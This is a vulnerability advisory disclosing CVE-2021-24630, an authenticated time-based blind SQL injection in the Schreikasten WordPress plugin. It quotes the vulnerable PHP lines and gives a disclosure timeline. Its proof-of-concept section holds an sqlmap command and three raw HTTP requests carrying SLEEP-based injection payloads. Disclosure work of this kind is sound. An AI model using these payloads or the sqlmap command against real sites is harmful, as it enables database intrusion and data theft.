wp-plugin : schreikasten | Code Vigilant : to err is human.. To fix is Humanity

Wp Plugin Schreikasten

Plugin Details

Plugin Name: wp-plugin : schreikasten

Effected Version : 0.14.18 (and most probably lower version's if any)

Vulnerability : Injection

Minimum Level of Access Required : Author

CVE Number : CVE-2021-24630

Identified by : Shreya Pohekar

WPScan Reference URL

Disclosure Timeline

June 15, 2021: Issue Identified and Disclosed to WPScan
June 21, 2021 : Plugin Closed
August 13, 2021 : CVE Assigned
October 7, 2021 : Public Disclosure

Technical Details

The reject, spam, delete and tracking functionality having GET parameters id and tid, available to Author and higher roles isnt properly sanitised, escaped or validated before being inserted into the SQL statement, therefore leading to time-based bline SQL Injection.

Vulnerable Code: schreikasten.php#L2208

Edit functionality

2206:			$id=$_GET['id'];
2207:			$table_name = $wpdb->prefix . "schreikasten";
2208:			$data = $wpdb->get_row("select alias, text, status, date, email from $table_name where id=$id");

Vulnerable Code: schreikasten.php#L2224

In the tracking functionality

2222:			$tid=$_GET['tid'];
2223:			$table_name = $wpdb->prefix . "schreikasten";
2224:			$data = $wpdb->get_row("select * from $table_name where id=$tid");

Vulnerable Code: schreikasten.php#L2239

set_spam, set_ham, set_black functionality

2237:			$id=$_GET['id'];
2238:			$table_name = $wpdb->prefix . "schreikasten";
2239:			$data = $wpdb->get_row("select alias, text, status, date, email from $table_name where id=$id");

PoC Screenshot

schreikasten-poc schreikasten-poc-1

Request

SQLmap command

sqlmap -r schreikasten.req.1 --dbms mysql --current-user --current-db -b -p tid --batch

GET /wp-admin/edit-comments.php?page=skmanage&mode=edit&text&paged=1&mode_x=delete_x&id=6 AND (SELECT 9304 FROM (SELECT(SLEEP(5)))ghFg) HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/edit-comments.php?page=skmanage&mode&text&paged=1&mode_x=delete_x&id=5
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7C7d46e52fd4a194588368c613588ee7cad1e52536df2ef3b1feb852a651d0be7f; __eucookielaw=true; _ga=GA1.1.436418670.1617784311; wp-settings-time-4=1619288085; ignored_html_tags=1; manage_settings=1; wordpress_test_cookie=WP%20Cookie%20check; sk-id=-732593242; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619788600; comment_author_232395f24f6cff47569f2739c21385d6=admin; comment_author_email_232395f24f6cff47569f2739c21385d6=admin%40localhost.com; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7Cbdffb007e4474c2bef17258655b9ead9c8b9bfc828fd770ad8adb901596a5dbb
Connection: close

Tracking

GET /wp-admin/edit-comments.php?page=skmanage&mode=tracking&text&paged=1&mode_x=delete_x&id=7&tid=6 AND (SELECT 9304 FROM (SELECT(SLEEP(5)))ghFg) HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/edit-comments.php?page=skmanage&mode&text&paged=1&mode_x=delete_x&id=7
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7C7d46e52fd4a194588368c613588ee7cad1e52536df2ef3b1feb852a651d0be7f; __eucookielaw=true; _ga=GA1.1.436418670.1617784311; wp-settings-time-4=1619288085; ignored_html_tags=1; manage_settings=1; wordpress_test_cookie=WP%20Cookie%20check; sk-id=-732593242; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619788600; comment_author_232395f24f6cff47569f2739c21385d6=admin; comment_author_email_232395f24f6cff47569f2739c21385d6=admin%40localhost.com; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7Cbdffb007e4474c2bef17258655b9ead9c8b9bfc828fd770ad8adb901596a5dbb
Connection: close

set_spam, set_ham, set_black

GET /wp-admin/edit-comments.php?page=skmanage&mode&text&paged=1&mode_x=set_black_x&id=2 AND (SELECT 6141 FROM (SELECT(SLEEP(5)))ewlo) HTTP/1.1
Host: 172.28.128.50
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/edit-comments.php?page=skmanage&mode&text
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7C7d46e52fd4a194588368c613588ee7cad1e52536df2ef3b1feb852a651d0be7f; __eucookielaw=true; _ga=GA1.1.436418670.1617784311; wp-settings-time-4=1619288085; ignored_html_tags=1; manage_settings=1; wordpress_test_cookie=WP%20Cookie%20check; sk-id=-732593242; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619788600; comment_author_232395f24f6cff47569f2739c21385d6=admin; comment_author_email_232395f24f6cff47569f2739c21385d6=admin%40localhost.com; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619961721%7CFTC7yo2JId9TWGN3c4mMtWOdy9aC5xBCxeIIMFHEXFC%7Cbdffb007e4474c2bef17258655b9ead9c8b9bfc828fd770ad8adb901596a5dbb
Connection: close